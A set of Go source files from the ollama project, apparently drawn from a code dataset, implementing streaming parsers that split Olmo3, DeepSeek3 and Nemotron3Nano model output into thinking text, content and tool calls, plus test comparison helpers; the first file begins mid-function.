switch event := event.(type) { case olmo3ParserEventContent: contentSb.WriteString(event.content) case olmo3ParserEventToolCalls: allCalls = append(allCalls, event.calls...) } } return contentSb.String(), "", allCalls, nil } func (p *Olmo3Parser) parseEvents() []olmo3ParserEvent { var all []olmo3ParserEvent keepLooping := true for keepLooping { var events []olmo3ParserEvent events, keepLooping = p.eat() if len(events) > 0 { all = append(all, events...) 
} } if len(all) > 0 { slog.Log(context.TODO(), logutil.LevelTrace, "olmo3 events parsed", "events", all, "state", p.state, "buffer", p.buffer.String()) } return all } func (p *Olmo3Parser) eat() ([]olmo3ParserEvent, bool) { var events []olmo3ParserEvent bufStr := p.buffer.String() if bufStr == "" { return events, false } switch p.state { case olmo3StateContent: if strings.Contains(bufStr, olmo3FuncCallsOpenTag) { // Found <function_calls> tag split := strings.SplitN(bufStr, olmo3FuncCallsOpenTag, 2) content := split[0] remaining := split[1] p.buffer.Reset() p.buffer.WriteString(remaining) p.state = olmo3StateToolCalls if len(content) > 0 { events = append(events, olmo3ParserEventContent{content: content}) } return events, true } else if overlapLen := overlap(bufStr, olmo3FuncCallsOpenTag); overlapLen > 0 { // Partial <function_calls> tag - withhold ambiguous content unambiguous := bufStr[:len(bufStr)-overlapLen] ambiguous := bufStr[len(bufStr)-overlapLen:] p.buffer.Reset() p.buffer.WriteString(ambiguous) if len(unambiguous) > 0 { events = append(events, olmo3ParserEventContent{content: unambiguous}) } return events, false } else { // Regular content - emit all p.buffer.Reset() if len(bufStr) > 0 { events = append(events, olmo3ParserEventContent{content: bufStr}) } return events, false } case olmo3StateToolCalls: if strings.Contains(bufStr, olmo3FuncCallsCloseTag) { // Found </function_calls> tag split := strings.SplitN(bufStr, olmo3FuncCallsCloseTag, 2) toolCallsStr := split[0] remaining := split[1] p.buffer.Reset() p.buffer.WriteString(remaining) p.state = olmo3StateToolCallsDone // Parse the function calls calls, err := parseOlmo3FunctionCalls(toolCallsStr) if err != nil { slog.Log(context.TODO(), logutil.LevelTrace, "failed to parse olmo3 function calls", "error", err, "content", toolCallsStr) } else if len(calls) > 0 { events = append(events, olmo3ParserEventToolCalls{calls: calls}) } return events, true } else if overlapLen := overlap(bufStr, 
olmo3FuncCallsCloseTag); overlapLen > 0 { // Partial </function_calls> tag - wait for more return events, false } // Still collecting tool calls, wait for close tag return events, false case olmo3StateToolCallsDone: // After tool calls, emit remaining content p.buffer.Reset() p.state = olmo3StateContent if len(bufStr) > 0 { events = append(events, olmo3ParserEventContent{content: bufStr}) } return events, false } return events, false } // parseOlmo3FunctionCalls parses function calls in Python-esque format: // func_name(arg1="value1", arg2=123) // Multiple calls are separated by newlines func parseOlmo3FunctionCalls(s string) ([]api.ToolCall, error) { var calls []api.ToolCall s = strings.TrimSpace(s) if s == "" { return calls, nil } // Split by newlines for multiple function calls lines := strings.Split(s, "\n") for _, line := range lines { line = strings.TrimSpace(line) if line == "" { continue } call, err := parseOlmo3SingleFunctionCall(line) if err != nil { return nil, fmt.Errorf("failed to parse function call %q: %w", line, err) } calls = append(calls, call) } return calls, nil } // Regex to match function call: func_name(args) var funcCallRegex = regexp.MustCompile(`^(\w+)\((.*)\)$`) func parseOlmo3SingleFunctionCall(s string) (api.ToolCall, error) { matches := funcCallRegex.FindStringSubmatch(s) if matches == nil { return api.ToolCall{}, fmt.Errorf("invalid function call format") } funcName := matches[1] argsStr := matches[2] args, err := parseOlmo3Arguments(argsStr) if err != nil { return api.ToolCall{}, fmt.Errorf("failed to parse arguments: %w", err) } return api.ToolCall{ Function: api.ToolCallFunction{ Name: funcName, Arguments: args, }, }, nil } // parseOlmo3Arguments parses comma-separated key=value pairs // Handles nested parentheses, brackets, braces, and quoted strings func parseOlmo3Arguments(s string) (api.ToolCallFunctionArguments, error) { args := api.NewToolCallFunctionArguments() s = strings.TrimSpace(s) if s == "" { return args, nil } // 
Split by commas, but respect nested structures and quotes parts := splitArguments(s) for _, part := range parts { part = strings.TrimSpace(part) if part == "" { continue } // Find the first = sign eqIdx := strings.Index(part, "=") if eqIdx == -1 { return api.ToolCallFunctionArguments{}, fmt.Errorf("invalid argument format: %s", part) } key := strings.TrimSpace(part[:eqIdx]) valueStr := strings.TrimSpace(part[eqIdx+1:]) value, err := parseOlmo3Value(valueStr) if err != nil { return api.ToolCallFunctionArguments{}, fmt.Errorf("failed to parse value for %s: %w", key, err) } args.Set(key, value) } return args, nil } // splitArguments splits arguments by commas, respecting quotes and nested structures func splitArguments(s string) []string { var parts []string var current strings.Builder depth := 0 inString := false stringChar := byte(0) escaped := false for i := range s { c := s[i] if escaped { current.WriteByte(c) escaped = false continue } if c == '\\' && inString { current.WriteByte(c) escaped = true continue } if (c == '"' || c == '\'') && !inString { inString = true stringChar = c current.WriteByte(c) continue } if c == stringChar && inString { inString = false stringChar = 0 current.WriteByte(c) continue } if !inString { switch c { case '(', '[', '{': depth++ current.WriteByte(c) case ')', ']', '}': depth-- current.WriteByte(c) case ',': if depth == 0 { parts = append(parts, current.String()) current.Reset() continue } current.WriteByte(c) default: current.WriteByte(c) } } else { current.WriteByte(c) } } if current.Len() > 0 { parts = append(parts, current.String()) } return parts } // parseOlmo3Value parses a value which can be a string, number, boolean, null, array, or object func parseOlmo3Value(s string) (any, error) { s = strings.TrimSpace(s) // Check for quoted string if (strings.HasPrefix(s, `"`) && strings.HasSuffix(s, `"`)) || (strings.HasPrefix(s, `'`) && strings.HasSuffix(s, `'`)) { // Remove quotes and unescape inner := s[1 : len(s)-1] return 
unescapeString(inner), nil } // Check for boolean if s == "true" || s == "True" { return true, nil } if s == "false" || s == "False" { return false, nil } // Check for null/None if s == "null" || s == "None" || s == "nil" { return nil, nil } // Check for number if i, err := strconv.ParseInt(s, 10, 64); err == nil { return i, nil } if f, err := strconv.ParseFloat(s, 64); err == nil { return f, nil } // Check for array [...] if strings.HasPrefix(s, "[") && strings.HasSuffix(s, "]") { return parseOlmo3Array(s[1 : len(s)-1]) } // Check for object {...} if strings.HasPrefix(s, "{") && strings.HasSuffix(s, "}") { return parseOlmo3Object(s[1 : len(s)-1]) } // Default to string without quotes return s, nil } func parseOlmo3Array(s string) ([]any, error) { s = strings.TrimSpace(s) if s == "" { return []any{}, nil } parts := splitArguments(s) var arr []any for _, part := range parts { val, err := parseOlmo3Value(part) if err != nil { return nil, err } arr = append(arr, val) } return arr, nil } func parseOlmo3Object(s string) (map[string]any, error) { s = strings.TrimSpace(s) if s == "" { return map[string]any{}, nil } // Objects use key: value or "key": value format obj := make(map[string]any) parts := splitArguments(s) for _, part := range parts { part = strings.TrimSpace(part) if part == "" { continue } // Find colon separator colonIdx := strings.Index(part, ":") if colonIdx == -1 { return nil, fmt.Errorf("invalid object entry: %s", part) } keyStr := strings.TrimSpace(part[:colonIdx]) valueStr := strings.TrimSpace(part[colonIdx+1:]) // Remove quotes from key if present if (strings.HasPrefix(keyStr, `"`) && strings.HasSuffix(keyStr, `"`)) || (strings.HasPrefix(keyStr, `'`) && strings.HasSuffix(keyStr, `'`)) { keyStr = keyStr[1 : len(keyStr)-1] } val, err := parseOlmo3Value(valueStr) if err != nil { return nil, fmt.Errorf("failed to parse value for key %s: %w", keyStr, err) } obj[keyStr] = val } return obj, nil } func unescapeString(s string) string { // Handle common escape 
sequences s = strings.ReplaceAll(s, `\\`, "\x00") // Placeholder for backslash s = strings.ReplaceAll(s, `\"`, `"`) s = strings.ReplaceAll(s, `\'`, `'`) s = strings.ReplaceAll(s, `\n`, "\n") s = strings.ReplaceAll(s, `\t`, "\t") s = strings.ReplaceAll(s, `\r`, "\r") s = strings.ReplaceAll(s, "\x00", `\`) // Restore backslash return s }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/deepseek3.go
model/parsers/deepseek3.go
package parsers import ( "encoding/json" "errors" "log/slog" "strings" "unicode" "github.com/ollama/ollama/api" ) type DeepSeek3ParserState int const ( DeepSeekCollectingThinking DeepSeek3ParserState = iota DeepSeekCollectingContent DeepSeekCollectingToolCalls DeepSeekCollectingToolOutput ) const ( deepseekThinkingCloseTag = "</think>" deepseekToolCallsBeginTag = "<|tool▁calls▁begin|>" deepseekToolCallsEndTag = "<|tool▁calls▁end|>" deepseekToolCallBeginTag = "<|tool▁call▁begin|>" deepseekToolCallEndTag = "<|tool▁call▁end|>" deepseekToolSepTag = "<|tool▁sep|>" deepseekToolOutputBeginTag = "<|tool▁output▁begin|>" deepseekToolOutputEndTag = "<|tool▁output▁end|>" ) type DeepSeek3Parser struct { state DeepSeek3ParserState buffer strings.Builder hasThinkingSupport bool } func (p *DeepSeek3Parser) HasToolSupport() bool { return true } func (p *DeepSeek3Parser) HasThinkingSupport() bool { return p.hasThinkingSupport } func (p *DeepSeek3Parser) setInitialState(lastMessage *api.Message, tools []api.Tool, thinkValue *api.ThinkValue) { prefill := lastMessage != nil && lastMessage.Role == "assistant" // Check both model capability AND request preference thinkingEnabled := p.HasThinkingSupport() && (thinkValue != nil && thinkValue.Bool()) if !thinkingEnabled { p.state = DeepSeekCollectingContent return } if prefill && lastMessage.Content != "" { p.state = DeepSeekCollectingContent return } p.state = DeepSeekCollectingThinking } func (p *DeepSeek3Parser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool { p.setInitialState(lastMessage, tools, thinkValue) return tools } type deepseekEvent interface { isDeepSeekEvent() } type deepseekEventThinkingContent struct { content string } type deepseekEventContent struct { content string } type deepseekEventToolCall struct { toolCall api.ToolCall } func (deepseekEventThinkingContent) isDeepSeekEvent() {} func (deepseekEventContent) isDeepSeekEvent() {} func (deepseekEventToolCall) isDeepSeekEvent() {} 
func (p *DeepSeek3Parser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) { p.buffer.WriteString(s) events := p.parseEvents() var toolCalls []api.ToolCall var contentSb strings.Builder var thinkingSb strings.Builder for _, event := range events { switch event := event.(type) { case deepseekEventToolCall: toolCalls = append(toolCalls, event.toolCall) case deepseekEventThinkingContent: thinkingSb.WriteString(event.content) case deepseekEventContent: contentSb.WriteString(event.content) } } return contentSb.String(), thinkingSb.String(), toolCalls, nil } func (p *DeepSeek3Parser) parseEvents() []deepseekEvent { var all []deepseekEvent keepLooping := true for keepLooping { var events []deepseekEvent events, keepLooping = p.eat() if len(events) > 0 { all = append(all, events...) } } return all } func (p *DeepSeek3Parser) eat() ([]deepseekEvent, bool) { var events []deepseekEvent bufStr := p.buffer.String() if bufStr == "" { return events, false } switch p.state { case DeepSeekCollectingThinking: if strings.Contains(bufStr, deepseekThinkingCloseTag) { // thinking[</think>] -> content split := strings.SplitN(bufStr, deepseekThinkingCloseTag, 2) thinking := split[0] thinking = strings.TrimRightFunc(thinking, unicode.IsSpace) remaining := split[1] remaining = strings.TrimLeftFunc(remaining, unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(remaining) p.state = DeepSeekCollectingContent if len(thinking) > 0 { events = append(events, deepseekEventThinkingContent{content: thinking}) } return events, true } else if overlapLen := overlap(bufStr, deepseekThinkingCloseTag); overlapLen > 0 { // partial </think> beforePartialTag := bufStr[:len(bufStr)-overlapLen] trailingLen := trailingWhitespaceLen(beforePartialTag) ambiguousStart := len(beforePartialTag) - trailingLen unambiguous := bufStr[:ambiguousStart] ambiguous := bufStr[ambiguousStart:] p.buffer.Reset() p.buffer.WriteString(ambiguous) if len(unambiguous) > 0 { events = 
append(events, deepseekEventThinkingContent{content: unambiguous}) } return events, false } else { // otherwise its thinking content whitespaceLen := trailingWhitespaceLen(bufStr) ambiguousStart := len(bufStr) - whitespaceLen unambiguous := bufStr[:ambiguousStart] ambiguous := bufStr[ambiguousStart:] p.buffer.Reset() p.buffer.WriteString(ambiguous) if len(unambiguous) > 0 { events = append(events, deepseekEventThinkingContent{content: unambiguous}) } return events, false } case DeepSeekCollectingContent: switch { case strings.Contains(bufStr, deepseekToolCallsBeginTag): // content[<|tool▁calls▁begin|>] -> tool calls split := strings.SplitN(bufStr, deepseekToolCallsBeginTag, 2) contentBefore := strings.TrimRightFunc(split[0], unicode.IsSpace) remaining := split[1] p.buffer.Reset() p.buffer.WriteString(remaining) p.state = DeepSeekCollectingToolCalls if len(contentBefore) > 0 { events = append(events, deepseekEventContent{content: contentBefore}) } return events, true case strings.Contains(bufStr, deepseekToolOutputBeginTag): // content[<|tool▁output▁begin|>] -> tool output split := strings.SplitN(bufStr, deepseekToolOutputBeginTag, 2) contentBefore := split[0] // Don't trim whitespace - preserve spaces remaining := split[1] p.buffer.Reset() p.buffer.WriteString(remaining) p.state = DeepSeekCollectingToolOutput if len(contentBefore) > 0 { events = append(events, deepseekEventContent{content: contentBefore}) } return events, true default: // otherwise its content p.buffer.Reset() if len(bufStr) > 0 { events = append(events, deepseekEventContent{content: bufStr}) } return events, false } case DeepSeekCollectingToolCalls: if idx := strings.Index(bufStr, deepseekToolCallBeginTag); idx != -1 { startIdx := idx + len(deepseekToolCallBeginTag) if endIdx := strings.Index(bufStr[startIdx:], deepseekToolCallEndTag); endIdx != -1 { toolCallContent := bufStr[startIdx : startIdx+endIdx] if toolCall, err := p.parseToolCallContent(toolCallContent); err == nil { remaining := 
bufStr[startIdx+endIdx+len(deepseekToolCallEndTag):] remaining = strings.TrimLeftFunc(remaining, unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(remaining) events = append(events, deepseekEventToolCall{toolCall: toolCall}) return events, true } else { slog.Warn("deepseek tool call parsing failed", "error", err) } } } if idx := strings.Index(bufStr, deepseekToolCallsEndTag); idx != -1 { remaining := bufStr[idx+len(deepseekToolCallsEndTag):] remaining = strings.TrimLeftFunc(remaining, unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(remaining) p.state = DeepSeekCollectingContent return events, true } return events, false case DeepSeekCollectingToolOutput: if idx := strings.Index(bufStr, deepseekToolOutputEndTag); idx != -1 { toolOutputContent := bufStr[:idx] remaining := bufStr[idx+len(deepseekToolOutputEndTag):] // Don't trim whitespace - preserve spaces after tool output tags p.buffer.Reset() p.buffer.WriteString(remaining) p.state = DeepSeekCollectingContent if len(toolOutputContent) > 0 { events = append(events, deepseekEventContent{content: toolOutputContent}) } return events, true } return events, false } return events, false } func (p *DeepSeek3Parser) parseToolCallContent(content string) (api.ToolCall, error) { // Expected format: tool_name<|tool▁sep|>{args} parts := strings.SplitN(content, deepseekToolSepTag, 2) if len(parts) < 2 { return api.ToolCall{}, errors.New("invalid format") } toolName := strings.TrimSpace(parts[0]) argsJSON := strings.TrimSpace(parts[1]) var args api.ToolCallFunctionArguments if err := json.Unmarshal([]byte(argsJSON), &args); err != nil { return api.ToolCall{}, err } return api.ToolCall{ Function: api.ToolCallFunction{ Name: toolName, Arguments: args, }, }, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/nemotron3nano.go
model/parsers/nemotron3nano.go
package parsers import ( "regexp" "strings" "unicode" "github.com/ollama/ollama/api" ) type Nemotron3NanoParserState int const ( Nemotron3NanoCollectingThinking Nemotron3NanoParserState = iota Nemotron3NanoSkipWhitespaceAfterThinking Nemotron3NanoCollectingContent Nemotron3NanoCollectingToolCalls ) const ( nemotronThinkClose = "</think>" nemotronToolCallOpen = "<tool_call>" nemotronToolCallClose = "</tool_call>" ) type Nemotron3NanoParser struct { state Nemotron3NanoParserState buffer strings.Builder tools []api.Tool } func (p *Nemotron3NanoParser) HasToolSupport() bool { return true } func (p *Nemotron3NanoParser) HasThinkingSupport() bool { return true } func (p *Nemotron3NanoParser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool { p.tools = tools // thinking is enabled if user requests it thinkingEnabled := thinkValue != nil && thinkValue.Bool() prefill := lastMessage != nil && lastMessage.Role == "assistant" if !thinkingEnabled { p.state = Nemotron3NanoCollectingContent return tools } if prefill && lastMessage.Content != "" { p.state = Nemotron3NanoCollectingContent return tools } p.state = Nemotron3NanoCollectingThinking return tools } type nemotronEvent interface { isNemotronEvent() } type nemotronEventThinkingContent struct { content string } type nemotronEventContent struct { content string } type nemotronEventToolCall struct { toolCall api.ToolCall } func (nemotronEventThinkingContent) isNemotronEvent() {} func (nemotronEventContent) isNemotronEvent() {} func (nemotronEventToolCall) isNemotronEvent() {} func (p *Nemotron3NanoParser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) { p.buffer.WriteString(s) events := p.parseEvents() var toolCalls []api.ToolCall var contentSb strings.Builder var thinkingSb strings.Builder for _, event := range events { switch event := event.(type) { case nemotronEventToolCall: toolCalls = append(toolCalls, event.toolCall) case 
nemotronEventThinkingContent: thinkingSb.WriteString(event.content) case nemotronEventContent: contentSb.WriteString(event.content) } } return contentSb.String(), thinkingSb.String(), toolCalls, nil } func (p *Nemotron3NanoParser) parseEvents() []nemotronEvent { var all []nemotronEvent keepLooping := true for keepLooping { var events []nemotronEvent events, keepLooping = p.eat() if len(events) > 0 { all = append(all, events...) } } return all } // emitWithPartialCheck extracts unambiguous content before a potential partial tag func (p *Nemotron3NanoParser) emitWithPartialCheck(bufStr, tag string) (unambiguous, ambiguous string) { if overlapLen := overlap(bufStr, tag); overlapLen > 0 { beforePartialTag := bufStr[:len(bufStr)-overlapLen] trailingLen := trailingWhitespaceLen(beforePartialTag) return bufStr[:len(beforePartialTag)-trailingLen], bufStr[len(beforePartialTag)-trailingLen:] } wsLen := trailingWhitespaceLen(bufStr) return bufStr[:len(bufStr)-wsLen], bufStr[len(bufStr)-wsLen:] } func (p *Nemotron3NanoParser) eat() ([]nemotronEvent, bool) { bufStr := p.buffer.String() if bufStr == "" { return nil, false } switch p.state { case Nemotron3NanoCollectingThinking: if strings.Contains(bufStr, nemotronThinkClose) { split := strings.SplitN(bufStr, nemotronThinkClose, 2) thinking := strings.TrimRightFunc(split[0], unicode.IsSpace) p.buffer.Reset() remainder := strings.TrimLeftFunc(split[1], unicode.IsSpace) p.buffer.WriteString(remainder) // Transition to whitespace-skipping state if buffer is empty, // otherwise go directly to content collection if remainder == "" { p.state = Nemotron3NanoSkipWhitespaceAfterThinking } else { p.state = Nemotron3NanoCollectingContent } if thinking != "" { return []nemotronEvent{nemotronEventThinkingContent{content: thinking}}, true } return nil, true } unambig, ambig := p.emitWithPartialCheck(bufStr, nemotronThinkClose) p.buffer.Reset() p.buffer.WriteString(ambig) if unambig != "" { return 
[]nemotronEvent{nemotronEventThinkingContent{content: unambig}}, false } return nil, false // We only want to skip whitespace between thinking and content case Nemotron3NanoSkipWhitespaceAfterThinking: bufStr = strings.TrimLeftFunc(bufStr, unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(bufStr) if bufStr == "" { return nil, false } p.state = Nemotron3NanoCollectingContent return nil, true case Nemotron3NanoCollectingContent: if strings.Contains(bufStr, nemotronToolCallOpen) { split := strings.SplitN(bufStr, nemotronToolCallOpen, 2) content := strings.TrimRightFunc(split[0], unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(split[1]) p.state = Nemotron3NanoCollectingToolCalls if content != "" { return []nemotronEvent{nemotronEventContent{content: content}}, true } return nil, true } unambig, ambig := p.emitWithPartialCheck(bufStr, nemotronToolCallOpen) p.buffer.Reset() p.buffer.WriteString(ambig) if unambig != "" { return []nemotronEvent{nemotronEventContent{content: unambig}}, false } return nil, false case Nemotron3NanoCollectingToolCalls: if strings.Contains(bufStr, nemotronToolCallClose) { split := strings.SplitN(bufStr, nemotronToolCallClose, 2) remaining := strings.TrimLeftFunc(split[1], unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(remaining) var events []nemotronEvent if tc, err := p.parseToolCall(split[0]); err == nil { events = append(events, nemotronEventToolCall{toolCall: tc}) } if !strings.Contains(remaining, nemotronToolCallOpen) { p.state = Nemotron3NanoCollectingContent } return events, true } return nil, false } return nil, false } var ( nemotronFunctionRegex = regexp.MustCompile(`<function=([^>]+)>`) nemotronParameterRegex = regexp.MustCompile(`<parameter=([^>]+)>\n?([\s\S]*?)\n?</parameter>`) ) func (p *Nemotron3NanoParser) parseToolCall(content string) (api.ToolCall, error) { toolCall := api.ToolCall{} // Extract function name fnMatch := nemotronFunctionRegex.FindStringSubmatch(content) if len(fnMatch) < 2 { return toolCall, 
nil } toolCall.Function.Name = fnMatch[1] // Extract parameters toolCall.Function.Arguments = api.NewToolCallFunctionArguments() paramMatches := nemotronParameterRegex.FindAllStringSubmatch(content, -1) for _, match := range paramMatches { if len(match) >= 3 { paramName := match[1] paramValue := strings.TrimSpace(match[2]) // Try to parse as typed value based on tool definition toolCall.Function.Arguments.Set(paramName, p.parseParamValue(paramName, paramValue)) } } return toolCall, nil } func (p *Nemotron3NanoParser) parseParamValue(paramName string, raw string) any { // Find the matching tool to get parameter type var paramType api.PropertyType for _, tool := range p.tools { if tool.Function.Parameters.Properties != nil { if prop, ok := tool.Function.Parameters.Properties.Get(paramName); ok { paramType = prop.Type break } } } return parseValue(raw, paramType) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/testhelpers_test.go
model/parsers/testhelpers_test.go
package parsers

import (
	"encoding/json"

	"github.com/google/go-cmp/cmp"

	"github.com/ollama/ollama/api"
)

// jsonMapsEqual reports whether two maps contain the same keys with
// deeply-equal values. Values are compared via their JSON encoding so nested
// structures compare by content rather than identity, and key order never
// matters. Marshal errors are deliberately ignored: these are test helpers
// operating on values that are expected to be JSON-encodable.
func jsonMapsEqual(a, b map[string]any) bool {
	if len(a) != len(b) {
		return false
	}
	for k, av := range a {
		bv, ok := b[k]
		if !ok {
			return false
		}
		aJSON, _ := json.Marshal(av)
		bJSON, _ := json.Marshal(bv)
		if string(aJSON) != string(bJSON) {
			return false
		}
	}
	return true
}

// argsComparer provides cmp options for comparing ToolCallFunctionArguments.
// It compares by logical equality (same keys with same values) not by order.
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
	return jsonMapsEqual(a.ToMap(), b.ToMap())
})

// propsComparer provides cmp options for comparing ToolPropertiesMap.
// Two nil maps are equal; a nil and a non-nil map are not.
var propsComparer = cmp.Comparer(func(a, b *api.ToolPropertiesMap) bool {
	if a == nil && b == nil {
		return true
	}
	if a == nil || b == nil {
		return false
	}
	aJSON, _ := json.Marshal(a)
	bJSON, _ := json.Marshal(b)
	return string(aJSON) == string(bJSON)
})

// toolsComparer combines argsComparer and propsComparer for comparing tools.
var toolsComparer = cmp.Options{argsComparer, propsComparer}

// toolCallEqual compares two tool calls by comparing their components:
// ID, function index, function name, and arguments. Arguments are compared
// by logical equality (same keys with same values) not by order, via the
// same helper that backs argsComparer.
func toolCallEqual(a, b api.ToolCall) bool {
	if a.ID != b.ID {
		return false
	}
	if a.Function.Index != b.Function.Index {
		return false
	}
	if a.Function.Name != b.Function.Name {
		return false
	}
	return jsonMapsEqual(a.Function.Arguments.ToMap(), b.Function.Arguments.ToMap())
}

// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
	props := api.NewToolPropertiesMap()
	for k, v := range m {
		props.Set(k, v)
	}
	return props
}

// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
	args := api.NewToolCallFunctionArguments()
	for k, v := range m {
		args.Set(k, v)
	}
	return args
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false